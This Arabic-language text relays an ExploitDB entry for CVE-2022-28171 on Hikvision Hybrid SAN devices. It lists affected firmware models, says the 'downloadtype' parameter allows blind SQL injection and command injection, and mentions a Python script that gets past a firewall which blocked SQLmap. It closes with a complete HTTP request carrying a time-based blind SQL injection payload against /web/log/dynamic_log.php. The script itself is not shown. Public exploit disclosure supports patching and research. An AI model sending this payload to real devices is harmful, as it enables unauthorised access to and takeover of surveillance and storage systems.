
استغلال Python لـ CVE-2022-28171 يستهدف أجهزة Hikvision Hybrid SAN، ويقوم بأتمتة حقن SQL الأعمى وحقن الأوامر لتحقيق تنفيذ التعليمات البرمجية عن بُعد.
نشرت هذا في الأصل على ExploitDB، ويمكنك العثور عليه على https://www.exploit-db.com/exploits/51607
# Date: 16 July 2023
# Exploit Author: Thurein Soe
# CVE : CVE-2022-28171
# Reference Link: https://cve.report/CVE-2022-28171
# Vulnerable Versions:
Ds-a71024 Firmware
Ds-a71024 Firmware
Ds-a71048r-cvs Firmware
Ds-a71048 Firmware
Ds-a71072r Firmware
Ds-a71072r Firmware
Ds-a72024 Firmware
Ds-a72024 Firmware
Ds-a72048r-cvs Firmware
Ds-a72072r Firmware
Ds-a80316s Firmware
Ds-a80624s Firmware
Ds-a81016s Firmware
Ds-a82024d Firmware
Ds-a71048r-cvs
Ds-a71024
Ds-a71048
Ds-a71072r
Ds-a80624s
Ds-a82024d
Ds-a80316s
Ds-a81016s
Hikvision هي شركة رائدة عالميًا في تصنيع وتوريد معدات المراقبة بالفيديو وإنترنت الأشياء (IoT) للأغراض المدنية والعسكرية. كانت بعض منتجات Hikvision Hybrid SAN عرضة لثغرات تنفيذ تعليمات برمجية عن بُعد متعددة مثل حقن الأوامر، وحقن SQL الأعمى، وتهريب طلبات HTTP، والبرمجة النصية عبر المواقع (XSS) المنعكسة. وقد أدى ذلك إلى تنفيذ تعليمات برمجية عن بُعد، مما أتاح تنفيذ أوامر نظام تشغيل عشوائية والمزيد.
أكد الاختبار اليدوي أن معامل "downloadtype" كان عرضة لحقن SQL الأعمى وحقن الأوامر. لقد أنشأت سكربت Python لأتمتة وتعداد إصدارات SQL، حيث كان التطبيق خلف جدار حماية ويحظر جميع الطلبات من SQLmap.
Request Body:
GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1
Host: X.X.X.X.12:2004
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close